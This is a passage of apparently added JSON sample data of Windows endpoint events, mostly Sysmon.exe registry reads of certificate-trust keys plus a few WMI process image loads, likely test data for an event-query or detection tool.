"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481050000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clusapi.dll", + "image_path": "C:\\Windows\\System32\\clusapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481360000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481360000, + "unique_pid": 